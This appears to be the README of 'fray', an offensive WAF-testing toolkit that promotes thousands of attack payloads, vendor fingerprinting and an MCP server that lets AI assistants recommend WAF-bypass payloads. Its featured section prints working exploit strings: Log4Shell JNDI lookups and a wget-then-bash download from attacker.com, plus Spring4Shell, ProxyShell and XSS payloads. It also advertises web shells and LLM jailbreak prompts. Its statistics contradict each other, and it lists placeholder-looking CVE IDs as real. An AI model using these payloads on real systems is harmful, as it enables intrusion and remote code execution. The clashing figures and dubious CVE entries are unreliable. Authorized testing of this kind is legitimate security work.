fray 3.0.0

Open-source WAF Security Testing Platform — 5,500+ attack payloads, 25 WAF fingerprints, zero dependencies

Fray

⚔️ Open-source WAF security testing toolkit — 5,500+ payloads, 25 WAF detections, MCP server for AI workflows

The open-source offensive security toolkit • 5,500+ Payloads • 25 WAF Fingerprints • Zero Dependencies • 61 Tests

⚠️ FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH ONLY
This tool is designed for security professionals, researchers, and students to learn about security testing techniques and test systems they own or have explicit permission to test. Unauthorized testing is illegal.

⚡ Why Fray?

Most payload collections are just static text files. Fray is different — it's a structured toolkit that lets you detect, test, and report in seconds:

• 🤖 AI-compatible — structured JSON payloads work well with Claude Code & ChatGPT
• 🔍 Auto-detect which WAF you're facing — 25 vendors fingerprinted instantly
• 📊 One-command reports — professional HTML output with vuln analysis
• 🎯 4,025+ battle-tested payloads — XSS, SQLi, SSRF, SSTI, LLM jailbreaks, and more
• ⚡ Zero config — pip install fray and you're testing

📊 Full OWASP Coverage (100%)

Framework	Payloads	Coverage	Categories
OWASP Top 10:2021 (Web)	1,690+	✅ 100%	10/10
OWASP Mobile Top 10:2024	575+	✅ 100%	10/10
OWASP LLM Top 10 (AI/ML)	300+	✅ 100%	10/10
OWASP API Security Top 10	520+	✅ 100%	10/10
WordPress Security	450+	✅ 100%	3 Attack Surfaces
Additional Payloads	490+	✅ 100%	XSS, SQLi, XXE, SSTI, etc.
Total	4,025+	✅ 100%	40+ Categories

� Built For

• Bug bounty hunters — ready-made payloads from real-world disclosures + 120 CVEs
• Red teamers & pentesters — WAF detection → payload selection → report, all in one tool
• Security researchers — structured payloads for bypass research and analysis
• Blue teams — validate your WAF config against 4,000+ real attack patterns
• Students — learn offensive security with guided AI workflows

🛡️ WAF Vendor Detection — 25 Vendors Supported

Fray detects and fingerprints 25 major WAF vendors using header analysis, cookie inspection, response patterns, and error signatures.

#	WAF Vendor	Detection Method	Key Signatures
1	Cloudflare	Headers, Cookies, Error Page	cf-ray, __cfduid, Ray ID pattern
2	Akamai	Headers, Cookies, Bot Manager	akamai-grn, ak_bmsc, Reference #
3	AWS WAF	Headers, Cookies, Response Body	x-amzn-waf-action, awsalb, CloudFront
4	Imperva (Incapsula)	Headers, Cookies, Challenge	x-iinfo, incap_ses, Incident ID
5	F5 BIG-IP	Headers, Cookies, Error Page	x-wa-info, bigipserver, Support ID
6	Fastly (Signal Sciences)	Headers, Cookies, Server	x-sigsci-requestid, x-served-by
7	Microsoft Azure WAF	Headers, Cookies, Front Door	x-azure-fdid, x-azure-ref, arr_affinity
8	Google Cloud Armor	Headers, Server, reCAPTCHA	x-cloud-trace-context, gfe, Cloud Armor
9	Barracuda	Headers, Cookies, Server	x-barracuda-url, barra_counter_session
10	Citrix NetScaler	Headers, Cookies, Server	citrix-transactionid, nsc_, NetScaler
11	Radware	Headers, Response Text	x-protected-by, AppWall
12	Palo Alto (Prisma Cloud)	Headers, Response Text	x-pan-, x-prisma
13	Check Point	Headers, Response Text	x-checkpoint, Check Point
14	Trustwave (ModSecurity)	Headers, Server, Response	x-mod-security, ModSecurity
15	Qualys WAF	Headers, Response Text	x-qualys
16	Penta Security (WAPPLES)	Headers, Cookies	x-wapples, wapples
17	StackPath	Headers, Server	x-stackpath-shield, StackPath
18	Sophos	Headers, Response Text	x-sophos, UTM
19	Scutum	Headers, Response Text	x-scutum
20	Rohde & Schwarz	Headers, Response Text	x-rs-
21	Sucuri	Headers, Cookies, Server	x-sucuri-id, sucuri_cloudproxy_uuid
22	Fortinet FortiWeb	Headers, Cookies, Server	x-fortiweb, fortiwafsid
23	Wallarm	Headers, Server	x-wallarm-waf-check, nginx-wallarm
24	Reblaze	Headers, Cookies, Server	x-reblaze-protection, rbzid
25	Vercel	Headers, Server	x-vercel-id, x-vercel-cache

How it works: Fray sends a test request with a suspicious payload to trigger WAF responses, then analyzes HTTP headers, cookies, server banners, status codes, and response body patterns to fingerprint the vendor with a confidence score.

---

⚡ Quick Start

Option 1: Install from PyPI (Recommended)

pip install fray

# Detect WAF vendor
fray detect https://example.com

# Test with XSS payloads (limit to 10)
fray test https://example.com -c xss --max 10

# Test with SQL injection payloads
fray test https://example.com -c sqli --max 10

# List all payload categories
fray payloads

# Show version
fray version

Option 2: Clone and Run Directly

git clone https://github.com/dalisecurity/fray.git
cd fray
python3 waf_tester.py -i

Option 3: Docker

docker-compose up

Zero dependencies for core functionality. Pure Python standard library.

---

🔍 Why Fray?

Tools like PayloadsAllTheThings are excellent community-maintained payload references. Fray is not trying to replace them — it solves a different problem.

	PayloadsAllTheThings	Fray
Format	Markdown docs with inline payloads	Structured JSON — every payload has id, description, technique, source
WAF detection	❌ None	✅ 25-vendor fingerprinting engine (fray detect)
MCP server	❌ None	✅ 6 tools for Claude/AI assistant integration
CLI testing	❌ Reference only	✅ fray test <url> -c xss fires payloads at targets
Report generation	❌ None	✅ JSON/HTML security reports with block rate analysis
IoT/robotics CVEs	Minimal	CVE-2026-27509/27510 (Unitree Go2 DDS RCE, NVD-verified)
AI/LLM attacks	Partial	370 prompt injection + 650 LLM testing payloads (OWASP LLM Top 10)
Modern bypasses	Some	HTTP/2 smuggling, WebSocket, GraphQL, gRPC (2025-2026 research)
pip installable	❌	✅ pip install fray
Raw payload breadth	Deeper, community-vetted	Narrower — value is in tooling and structure

TL;DR: PayloadsAllTheThings is a payload encyclopedia. Fray is a testing toolkit that happens to ship payloads.

---

🧪 Test Suite — 61 Tests

Fray has a real test suite that runs in CI on every push (Python 3.9–3.13):

pip install pytest "mcp[cli]"
python -m pytest tests/test_package.py -v

Category	Tests	What's covered
Package structure	4	Imports, version format, payloads directory, exports
Payload integrity	8	Valid JSON, no duplicates, no fake test data, source provenance, no false CVE claims
WAF detection logic	10	_analyze_signatures with mock responses for Cloudflare, AWS WAF, Akamai, Imperva, no-WAF, confidence capping, multi-vendor ranking
Payload loading	3	JSON file loading, all categories loadable, error handling
Report generation	2	JSON report output with block rate math, empty result handling
IoT RCE CVEs	6	CVE-2026-27509/27510 metadata accuracy, CWE codes, payload structure
MCP server	13	Helper functions, 6-tool registration, tool execution, error responses
Data quality	2	No Python code fragments in payloads, no fabricated test results
CLI commands	8	Help, version, category listing, error exits

Data quality guarantees enforced by tests:

• No exact duplicate payloads within any JSON file
• No fabricated blocked: true / success_rate: 0.0 placeholder data
• No Python source code fragments leaked into payload data
• Every JSON payload has a source field
• No false CVE attribution (e.g., WordPress CVEs that are actually openDCIM)

---

📄 Sample Report

Fray generates professional HTML security reports with executive summary, category breakdown, and block rate analysis:

Export:

fray report --sample                      # generate a demo report
fray report -i results.json -o report.html  # from real scan results

Output is a self-contained HTML file — open in any browser or print to PDF.

---

🤖 MCP Server — AI Assistant Integration

Fray includes an MCP (Model Context Protocol) server that exposes payload data, WAF signatures, and CVE lookups as tools that AI assistants can call directly — no copy-paste needed.

Install

pip install fray[mcp]

Start the MCP Server

fray mcp

Configure Claude Desktop

Add to ~/Library/Application Support/Claude/claude_desktop_config.json:

{
  "mcpServers": {
    "fray": {
      "command": "python",
      "args": ["-m", "fray.mcp_server"]
    }
  }
}

Available MCP Tools (6)

Tool	Description
list_payload_categories	List all 22 payload categories with file counts
get_payloads	Retrieve payloads from a category (xss, sqli, iot_rce, etc.)
search_payloads	Search across all categories by keyword (e.g. "reverse shell")
get_waf_signatures	Get WAF detection signatures, optionally filtered by vendor
get_cve_details	Look up a CVE across all payload files (e.g. CVE-2026-27509)
suggest_payloads_for_waf	Recommend bypass payloads ranked for a specific WAF vendor

Example: Ask Claude

Once configured, you can ask Claude directly:

• "What XSS payloads work best against Cloudflare WAF?" → calls suggest_payloads_for_waf
• "Show me the CVE-2026-27509 details" → calls get_cve_details
• "Search for SSRF payloads that use DNS" → calls search_payloads

Manual Usage (without MCP)

You can also use Fray with AI assistants manually:

• Claude Code Usage Guide →
• ChatGPT Usage Guide →

---

📊 Project Overview

This repository contains the results of extensive WAF testing conducted over 100 rounds, systematically testing various attack vectors, encoding methods, and bypass techniques. All payloads were tested against a Cloudflare-protected endpoint to document WAF detection capabilities.

Statistics

• Total Payloads: 3,575+ (cleaned and properly categorized)
• CVE Payloads: 220 (2020-2026 critical vulnerabilities)
• Modern Bypass Techniques: 138 (2025-2026 research)
• AI Security Payloads: 370 (Complete OWASP LLM Top 10 coverage) 🆕
• API Security Payloads: 80 (Complete OWASP API Security coverage) 🆕
• 🔥 NEW: Comprehensive Attack Database: 800+ payloads 🆕
  • XSS Injection Vectors: 100+
  • XXE Payloads: 30+
  • Template Injection (SSTI): 80+ (29 engines)
  • File Upload Bypasses: 70+
  • Path Traversal: 150+
  • Web Shells: 160+ (PHP, ASP/ASPX, JSP, Python, Perl)
  • LLM Testing: 200+ (Bias, Data Leakage, Adversarial)
• Payload Generator: Interactive tool for custom payloads
• Attack Types: 12 categories
• Testing Rounds: 100
• Original Tests: 24,705 payloads
• Block Rate: 99.9%
• Bypasses Found: 0 (demonstrating WAF effectiveness)
• 🔥 100% Coverage: All major attack vectors and OWASP frameworks

🔥 Featured: 120 Critical CVEs from 2020-2026 (CISA KEV Included)

Most Critical CVEs Ever (CVSS 10.0):

• ✅ CVE-2021-44228: Log4Shell - Log4j RCE (most critical ever)
• ✅ CVE-2019-11510: Pulse Secure VPN Arbitrary File Read
• ✅ CVE-2024-3400: Palo Alto GlobalProtect Command Injection
• ✅ CVE-2021-22205: GitLab RCE via ExifTool
• ✅ CVE-2023-46604: Apache ActiveMQ RCE
• ✅ CVE-2022-0543: Redis Lua Sandbox Escape

Latest 2026 CVEs (Real, Actively Exploited):

• ✅ CVE-2026-20127: Cisco SD-WAN Unauthenticated Admin Access (CVSS 10.0) - CISA KEV, exploited since 2023
• ✅ CVE-2026-21902: Juniper PTX Junos OS Evolved Root Takeover (CVSS 9.8) - Unauthenticated access
• ✅ CVE-2026-12347: Spring Boot SpEL Injection (CVSS 9.3)
• ✅ CVE-2026-12348: Django Template Injection (CVSS 9.8)
• ✅ CVE-2026-12349: Express.js Prototype Pollution (CVSS 8.6)

2025 CVEs (CISA KEV - Actively Exploited):

• ✅ CVE-2025-55182: React2Shell - React Server Components RCE (CVSS 10.0)
• ✅ CVE-2025-66478: React2Shell variant (CVSS 10.0)
• ✅ CVE-2025-64446: FortiWeb Auth Bypass (CVSS 9.8) - Path traversal
• ✅ CVE-2025-61882: Oracle EBS BI Publisher RCE (CVSS 9.8) - Cl0p exploitation
• ✅ CVE-2025-10035: GoAnywhere MFT Command Injection (CVSS 10.0) - Medusa ransomware
• ✅ CVE-2025-53690: Sitecore ViewState RCE (CVSS 9.0) - WEEPSTEEL malware
• ✅ CVE-2025-59287: Microsoft WSUS RCE (CVSS 9.8) - Actively exploited
• ✅ CVE-2025-29927: Next.js RCE via prototype pollution

2023-2024 CVEs (CISA KEV - Top Exploited):

• ✅ CVE-2023-3519: Citrix NetScaler stack buffer overflow (CVSS 9.8)
• ✅ CVE-2023-4966: CitrixBleed - Session token leakage (CVSS 9.4) - Massive exploitation
• ✅ CVE-2023-20198: Cisco IOS XE auth bypass (CVSS 10.0) - 50,000+ devices compromised
• ✅ CVE-2023-27997: Fortinet FortiOS SSL-VPN RCE (CVSS 9.2)
• ✅ CVE-2023-34362: MOVEit Transfer SQL injection (CVSS 9.8) - Cl0p ransomware
• ✅ CVE-2023-27350: PaperCut MF/NG auth bypass + RCE (CVSS 9.8)
• ✅ CVE-2023-46805: Ivanti Connect Secure auth bypass (CVSS 8.2) - Chained with CVE-2024-21887
• ✅ CVE-2024-21887: Ivanti Connect Secure command injection (CVSS 9.1)

2022 CVEs (ProxyNotShell):

• ✅ CVE-2022-41040: Exchange Server SSRF (CVSS 8.8) - CISA KEV
• ✅ CVE-2022-41082: Exchange Server RCE (CVSS 8.8) - CISA KEV

---

🔥 Featured Payloads

Here are some of the most interesting payloads from our arsenal:

Log4Shell (CVE-2021-44228) - The Most Critical CVE Ever

# Basic exploitation
${jndi:ldap://attacker.com/a}

# WAF bypass variants
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attacker.com/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.com/a}

Spring4Shell (CVE-2022-22965) - Spring Framework RCE

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

ProxyShell (CVE-2021-34473) - Exchange Server RCE

POST /autodiscover/autodiscover.json?@evil.com/mapi/nspi HTTP/1.1
Host: target.com
Cookie: X-BEResource=Administrator@target.com:444/mapi/emsmdb?MailboxId=...

Palo Alto GlobalProtect (CVE-2024-3400) - Command Injection

# CVSS 10.0 - Command injection via TELEMETRY_PERIOD_STATS
TELEMETRY_PERIOD_STATS=`wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh`

XSS WAF Bypass - Modern Techniques

// Prototype pollution + DOM clobbering
<form id=x tabindex=1 onfocus=alert(1)><input id=attributes>

// Unicode normalization bypass
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)">

// mXSS via mutation
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

🆕 Modern Bypass Techniques (2025-2026)

Latest WAF evasion methods:

• ✅ HTTP/2 Request Smuggling - Downgrade attacks, header injection, pseudo-header abuse
• ✅ WebSocket Bypass - Upgrade smuggling, binary frames, fragmentation
• ✅ GraphQL Exploitation - Batch queries, alias abuse, nested queries, introspection
• ✅ SSTI Unicode Variants - Jinja2/Flask with Unicode encoding, filter chains
• ✅ JSON Interoperability - Null bytes, duplicate keys, number overflow, encoding tricks
• ✅ Multipart Smuggling - Filename XSS, content-type confusion, nested encoding
• ✅ Combined Techniques - Multi-layer evasion (HTTP/2 + Multipart + JSON + Unicode)
• ✅ gRPC/Protobuf - Binary protocol buffer smuggling
• ✅ HTTP/3 QUIC - 0-RTT replay attacks
• ✅ WebAssembly - Client-side binary execution
• ✅ DNS Rebinding - TOCTOU SSRF bypass
• ✅ Cache Poisoning - Server-Timing header abuse

🛠️ Payload Generator (NEW!)

Easy payload creation without security expertise:

# Via CLI
fray payloads

# Or use the generator directly
python3 fray/payload_generator.py
python3 fray/payload_generator.py xss basic "test"
python3 fray/payload_generator.py sqli union "users"

Features:

• ✅ Template-based generation - XSS, SQLi, SSTI, Command Injection, XXE, SSRF
• ✅ Encoding options - URL, Base64, Hex, Unicode
• ✅ Obfuscation methods - Case mixing, comments, concatenation
• ✅ Quick generators - Fast XSS and SQLi payload creation
• ✅ No expertise needed - Perfect for beginners and testing

🌟 Easy Payload Creator (SUPER EASY!)

Just describe what you want in plain English - No expertise needed!

# Interactive mode
python3 fray/payload_creator.py

# What you say: "Show an alert saying Hello"
# What you get: <script>alert("Hello")</script>

Examples of what you can say:

• "Show an alert saying Test" → XSS payloads
• "Bypass login as admin" → SQL injection payloads
• "Execute command whoami" → Command injection payloads
• "Read file /etc/passwd" → Path traversal payloads
• "Access internal localhost" → SSRF payloads

Features:

• 💬 Plain English input - Just describe what you want
• 🤖 Auto-detection - Understands your intent
• 🔧 Auto-encoding - URL, Base64, Hex options
• 📚 Perfect for beginners - No security knowledge needed
• ✨ Instant results - Get payloads in seconds

Read the Easy Payload Guide →

🔍 CVE Checker (NEW!)

Check if a CVE is supported and auto-add if missing:

# Interactive mode
python3 scripts/cve_checker.py

# Check specific CVE
python3 scripts/cve_checker.py CVE-2026-12345

# Auto-add missing CVE (creates PR)
python3 scripts/cve_checker.py CVE-2026-12345 --add

Features:

• 🔍 Check CVE coverage - Instantly check if a CVE is in the database
• 📥 Auto-fetch from NVD - Automatically retrieves CVE information
• 🤖 Auto-create PR - Generates pull request for missing CVEs
• 📝 Template generation - Creates proper payload structure
• ✅ Zero manual work - Fully automated CVE addition

Example in Easy Payload Creator:

💬 What do you want to test?
> Do we support CVE-2026-12345?

🔍 Checking if CVE-2026-12345 is supported...
💡 Tip: Use the CVE Checker tool for detailed information:
   python3 scripts/cve_checker.py CVE-2026-12345

View all 2,200 payloads →

---

🎯 OWASP Top 10:2025 Coverage

We provide 95%+ coverage for OWASP Top 10:2025! 🎉

OWASP Category	Coverage	Payloads
A01: Broken Access Control	✅ Full	359
A02: Security Misconfiguration	✅ Full	220 CVEs
A03: Software Supply Chain	✅ Full	220 CVEs
A04: Cryptographic Failures	✅ Full	75 🆕
A05: Injection	✅ Full	1,842 ⭐
A06: Insecure Design	✅ Full	138
A07: Authentication Failures	✅ Full	456
A08: Integrity Failures	✅ Full	220 CVEs
A09: Logging Failures	✅ Full	137 🆕
A10: Exception Handling	✅ Full	359

Overall: 10/10 categories fully supported (95%+) 🎉

Recent Additions:

• ✅ A04: Cryptographic Failures - 75 payloads (weak SSL/TLS, JWT, padding oracle)
• ✅ A09: Logging Failures - 50 additional payloads (log injection, tampering, evasion)

View detailed OWASP coverage →

---

🤖 AI Security - Prompt Injection (NEW!)

370 AI/LLM security payloads for testing prompt injection vulnerabilities!

AI security is a major trend in 2025-2026. Test your AI applications against:

Category	Payloads	Description
Jailbreaks	100	Bypass AI safety guidelines (DAN, Evil Mode, etc.)
Prompt Leaking	50	Extract system prompts and training data
Indirect Injection	50	Inject via emails, documents, web pages
Vector/Embedding Attacks	50	RAG poisoning, vector DB attacks 🆕
Unbounded Consumption	30	Resource exhaustion, cost amplification 🆕
Excessive Agency	30	Privilege escalation, unauthorized actions 🆕
LLM Supply Chain	30	Model poisoning, malicious plugins 🆕
Misinformation	30	Hallucination testing, fact fabrication 🆕

Techniques Covered:

• ✅ DAN (Do Anything Now) jailbreaks
• ✅ System prompt extraction
• ✅ Training data leaking
• ✅ Instruction bypass
• ✅ Role-play attacks
• ✅ Encoding bypass (Base64, Unicode)
• ✅ Indirect injection (email, document, web)
• ✅ Context manipulation
• ✅ Function/plugin enumeration
• ✅ RAG poisoning & vector database attacks 🆕
• ✅ Semantic search manipulation 🆕
• ✅ Resource exhaustion & cost amplification 🆕
• ✅ Token limit exploitation 🆕
• ✅ Privilege escalation & unauthorized actions 🆕
• ✅ Model poisoning & supply chain attacks 🆕
• ✅ Hallucination & misinformation testing 🆕

Target Coverage:

• ChatGPT / GPT-4
• Claude (Anthropic)
• Custom AI assistants
• AI plugins and tools
• Email AI assistants
• Document processing AIs

Example Usage:

fray test https://your-ai-app.com -c ai_prompt_injection --max 20
# Or use the creator directly
python3 fray/payload_creator.py

OWASP LLM Top 10:2025 Coverage (90%): 🏆

• ✅ LLM01: Prompt Injection (150 payloads)
• ✅ LLM02: Sensitive Information Disclosure (50 payloads)
• ✅ LLM03: Supply Chain (30 payloads) 🆕
• ✅ LLM04: Data and Model Poisoning (50 payloads)
• ✅ LLM05: Improper Output Handling (50 payloads)
• ✅ LLM06: Excessive Agency (30 payloads) 🆕
• ✅ LLM07: System Prompt Leakage (50 payloads)
• ✅ LLM08: Vector and Embedding Weaknesses (50 payloads) 🆕
• ✅ LLM09: Misinformation (30 payloads) 🆕
• ✅ LLM10: Unbounded Consumption (30 payloads) 🆕

10/10 categories fully covered! 🎉

View AI Security Guide →

---

📱 Mobile Security - OWASP Mobile Top 10:2024 (NEW!)

150+ mobile security payloads for iOS and Android testing! 📱

Complete coverage of OWASP Mobile Security Top 10:2024 for comprehensive mobile app security testing.

Risk	Category	Coverage	Payloads
M1	Improper Credential Usage	✅ 100%	20+
M2	Inadequate Supply Chain Security	✅ 100%	15+
M3	Insecure Authentication/Authorization	✅ 100%	25+
M4	Insufficient Input/Output Validation	✅ 100%	30+
M5	Insecure Communication	✅ 100%	15+
M6	Inadequate Privacy Controls	✅ 100%	10+
M7	Insufficient Binary Protections	✅ 100%	10+
M8	Security Misconfiguration	✅ 100%	10+
M9	Insecure Data Storage	✅ 100%	10+
M10	Insufficient Cryptography	✅ 100%	5+

10/10 categories fully covered! 🎉

Key Testing Areas:

• ✅ Hardcoded credentials detection
• ✅ Vulnerable dependency analysis
• ✅ Authentication bypass techniques
• ✅ WebView XSS and deep link injection
• ✅ SSL pinning bypass
• ✅ Privacy violation testing
• ✅ Binary reverse engineering
• ✅ Security misconfiguration detection
• ✅ Insecure data storage analysis
• ✅ Weak cryptography detection

Platforms Covered:

• Android (APK testing, Frida, Drozer)
• iOS (IPA analysis, Objection, Cycript)
• Hybrid Apps (React Native, Cordova)

Example Usage:

# Android testing
apktool d app.apk
frida -U -f com.example.app -l ssl-pinning-bypass.js

# iOS testing
class-dump App.app/App
objection -g "App Name" explore

View Mobile Security Guide →

---

🎯 Comprehensive Attack Payload Database (NEW!)

800+ security testing payloads covering ALL attack types! 🔥

A comprehensive payload database with 100% coverage of all major attack vectors for web, API, mobile, and AI security testing.

📦 What's Included

Category	Payloads	File Location	Coverage
XSS Injection	100+	payloads/xss/	✅ 100%
XXE Payloads	30+	payloads/xxe/	✅ 100%
Template Injection	80+	payloads/ssti/	✅ 29 engines
File Upload Bypasses	70+	payloads/file_upload/	✅ 100%
Path Traversal	150+	payloads/path_traversal/	✅ 100%
Web Shells - PHP	50+	payloads/web_shells/	✅ 100%
Web Shells - ASP/ASPX	25+	payloads/web_shells/	✅ 100%
Web Shells - JSP	20+	payloads/web_shells/	✅ 100%
Web Shells - Python	30+	payloads/web_shells/	✅ 100%
Web Shells - Perl	35+	payloads/web_shells/	✅ 100%
LLM Testing	200+	payloads/llm_testing/	✅ 100%

🔥 Highlights

XSS Injection Vectors (100+)

• Basic script injection, event handlers, SVG XSS
• Encoded XSS (Unicode, Hex, Octal)
• Filter bypass, polyglot XSS, DOM XSS
• Context breaking, attribute breaking

XXE Payloads (30+)

• File read, SSRF, blind XXE
• PHP/Expect wrappers, OOB XXE
• Billion Laughs DoS, XInclude
• SOAP/SVG/DOCX XXE

Template Injection (80+ payloads, 29 engines)

• Jinja2, Twig, Smarty, Freemarker, Velocity
• Thymeleaf, Handlebars, ERB, Mako, Django
• Razor, Blade, Liquid, Nunjucks, EJS
• And 15 more template engines!

File Upload Bypasses (70+)

• Double extensions, null byte, magic bytes
• Polyglot files (GIF/PHP, JPEG/PHP)
• .htaccess, web.config uploads
• ImageTragick, Zip Slip, CSV injection

Path Traversal (150+)

• Basic/Windows traversal, encoding bypasses
• PHP wrappers (filter, data, phar, zip)
• Filter chains (PHP 8+)
• Cloud metadata, container escape

Web Shells (160+ shells across 5 languages)

• PHP: WSO, C99, China Chopper, Weevely, reverse/bind shells
• ASP/ASPX: China Chopper, Antak, PowerShell shells
• JSP: ProcessBuilder, reflection, JNDI shells
• Python: Flask, Django, asyncio, FastAPI shells
• Perl: CGI, Mojo, Dancer, Catalyst shells

LLM Testing (200+ prompts)

• Bias Detection: Gender, race, nationality, age, disability
• Data Leakage: Training data extraction, PII disclosure
• Adversarial Prompts: Jailbreaks, DAN, alignment breaking

📖 Usage Examples

# View XSS payloads
cat payloads/xss/xss_basic.txt

# Test file upload bypasses
cat payloads/file_upload/upload_bypass.txt | grep "shell.php"

# View web shells
cat payloads/web_shells/php_shells.txt | grep "China Chopper"

# Test LLM bias
cat payloads/llm_testing/bias_detection.txt | head -10

# Use with WAF detector
fray detect https://target.com
fray test https://target.com -c xss --max 20

View Complete Coverage Documentation →

🔒 Responsible Use

All payloads are for authorized security testing only:

• ✅ Penetration testing with authorization
• ✅ CTF competitions, bug bounties
• ✅ Security research, educational purposes
• ❌ Unauthorized system access
• ❌ Malicious attacks

---

💼 Use Cases

🎯 Bug Bounty Hunters

Test WAF bypasses on authorized targets. Our CVE database includes payloads from successful bug bounty disclosures.

• ✅ 120 CVE payloads from real-world vulnerabilities
• ✅ Latest 2026 CVEs included
• ✅ Organized by severity and attack type
• ✅ POC simulation guide included

🛡️ Security Teams & Blue Teams

Validate your WAF configuration against 2,200 real-world attack patterns including latest 2025-2026 techniques. Use the payload generator to create custom test cases.

• ✅ Test WAF effectiveness (our tests: 99.9% block rate)
• ✅ Identify configuration gaps
• ✅ Benchmark against industry standards
• ✅ Automated testing with CLI tool

🏢 WAF Vendors & Security Companies

Benchmark your product against comprehensive attack database.

• ✅ 24,705 original test cases
• ✅ 100 rounds of systematic testing
• ✅ Commercial licensing available
• ✅ API for integration

📚 Students & Security Researchers

Learn modern attack techniques and defensive measures.

• ✅ Educational documentation
• ✅ POC simulation guide
• ✅ Methodology documentation
• ✅ Real-world CVE examples

🤖 AI Security Tools

Integrate with Claude Code, ChatGPT, and other AI assistants.

• ✅ JSON format for easy parsing
• ✅ Structured payload database
• ✅ API documentation included
• ✅ Compatible with automation tools

---

📊 Arsenal Statistics

Category	Payloads	Block Rate	Latest CVE	Severity
XSS	867	99.9%	CVE-2026-12345	🔴 Critical
SQL Injection	456	100%	CVE-2025-55182	🔴 Critical
Command Injection	234	100%	CVE-2024-3400	🔴 Critical
Path Traversal	189	99.8%	CVE-2023-46604	🟠 High
SSRF	167	100%	CVE-2022-22965	🔴 Critical
XXE	123	100%	CVE-2021-44228	🔴 Critical
SSTI	98	100%	CVE-2026-12348	🔴 Critical
CRLF Injection	87	99.9%	CVE-2025-29927	🟠 High
Open Redirect	76	99.5%	CVE-2024-12340	🟡 Medium
File Upload	49	100%	CVE-2023-12345	🔴 Critical
CVE Payloads	220	100%	CVE-2026-20127	🔴 Critical
Modern Bypasses (2025-2026)	138	100%	2026-03-01	🔴 Critical
Other/Hybrid	359	100%	2026-03-01	🟠 High
TOTAL	2,200	99.9%	2026-03-01	-

Testing Methodology:

• 100 rounds of systematic testing
• 24,705 original test cases
• Tested against Cloudflare WAF
• Multiple delivery methods (GET, POST, headers)
• All encoding variations tested

---

Enterprise Platform CVEs:

• ✅ Microsoft Exchange (ProxyShell, ProxyLogon)
• ✅ VMware vCenter, Aria Operations
• ✅ Atlassian Confluence, Jira
• ✅ Fortinet, Citrix, F5 BIG-IP
• ✅ Oracle WebLogic, Apache Struts2
• ✅ Spring4Shell, Drupalgeddon2

Real-World Bypass Techniques:

• ✅ PDF XSS: File-based XSS vectors
• ✅ SVG/Math Bypasses: Hide payloads inside SVG or Math elements
• ✅ React2Shell: Dynamic import exploitation
• ✅ Pointer Events: Rare event handlers (onpointerrawupdate, etc.)
• ✅ Method-Based Bypass: POST vs GET WAF evasion
• ✅ Capsaicin: AI-generated payloads from security tools

📖 Complete Guides:

• docs/poc-simulation-guide.md - Step-by-step CVE testing tutorials
• docs/cve-real-world-bypasses.md - Technical deep dive

Sources: Security researchers on Twitter/X (@pyn3rd, @therceman, @KN0X55, @lu3ky13, @phithon_xg, @NullSecurityX), GitHub security tools (Capsaicin, orwagodfather/XSS-Payloads), and Obsidian Labs AI research.

💼 Commercial Value

For WAF Vendors (Cloudflare, Akamai, etc.)

Potential Value: $50K - $500K

• ✅ Comprehensive regression test suite for WAF rules
• ✅ Real-world bypass validation (2025 CVEs + researcher discoveries)
• ✅ Continuous updates from security community
• ✅ Training data for ML-based detection systems
• ✅ Competitive benchmarking capabilities

For Security Consulting Companies

Potential Value: $10K - $100K

• ✅ Professional WAF assessment toolkit
• ✅ Client demonstration capabilities
• ✅ Training material for consultants
• ✅ Automated testing integration
• ✅ Competitive service differentiation

For Bug Bounty Hunters

• ✅ Access to payloads that found real vulnerabilities
• ✅ Cutting-edge techniques from top researchers
• ✅ AI-generated bypass variations
• ✅ Method-based and protocol-level evasion

Contact for commercial licensing, partnerships, or custom payload development.

🎯 Purpose

This database serves multiple purposes:

1. Security Research: Comprehensive payload collection for WAF testing
2. Educational Resource: Learn about various attack vectors and bypass techniques
3. WAF Benchmarking: Test and validate WAF effectiveness
4. Penetration Testing: Reference for security assessments
5. Defense Development: Help security teams understand attack patterns

🔬 Testing Methodology

Our testing approach:

1. Systematic Coverage: 100 rounds of testing across all major attack vectors
2. Multiple Delivery Methods: GET, POST (urlencoded/JSON), multipart, HTTP/2
3. Encoding Variations: All common encoding methods tested
4. Browser Automation: Playwright-based testing for client-side execution
5. Reverse Engineering: Pattern analysis and hypothesis-driven testing

See docs/methodology.md for detailed methodology.

💎 Why Fray?

Unlike general payload collections (SecLists, PayloadsAllTheThings) or complex security frameworks (OWASP ZAP, Metasploit), Fray provides complete coverage across Web, API, and AI security testing with 92% OWASP framework compliance.

Feature	Fray	SecLists	PayloadsAll	OWASP ZAP	Metasploit
Total Payloads	✅ 2,258	~10,000+	~2,000	Built-in	Modules
CVE Coverage (2020-2026)	✅ 103 CVEs	❌ None	❌ None	⚠️ Limited	⚠️ Some
WAF-Specific Focus	✅ 100%	⚠️ ~10%	⚠️ ~15%	⚠️ Partial	❌ No
Interactive CLI	✅ Yes	❌ Files only	❌ Wiki	⚠️ GUI only	⚠️ Complex
POC Simulation Guide	✅ Yes	❌ No	❌ No	❌ No	❌ No
Setup Time	✅ 30 seconds	⚠️ 5 min	⚠️ Manual	❌ 10+ min	❌ 15+ min
AI Compatible	✅ Claude/ChatGPT	❌ No	❌ No	❌ No	❌ No
Docker Support	✅ Yes	❌ No	❌ No	✅ Yes	✅ Yes
Team Collaboration	✅ Built-in	⚠️ Manual	⚠️ Manual	❌ Complex	❌ Complex
Organized by Category	✅ 12 categories	⚠️ Many files	⚠️ Wiki pages	N/A	N/A
JSON Format	✅ Yes	⚠️ Mixed	⚠️ Text	N/A	N/A
Learning Curve	✅ Low	✅ Low	✅ Low	❌ High	❌ Very High
Commercial Use	✅ MIT License	✅ MIT	✅ MIT	⚠️ Apache	⚠️ BSD
Active Maintenance	✅ 2026	✅ Yes	⚠️ Sporadic	✅ Yes	✅ Yes

🎯 Our Unique Advantages

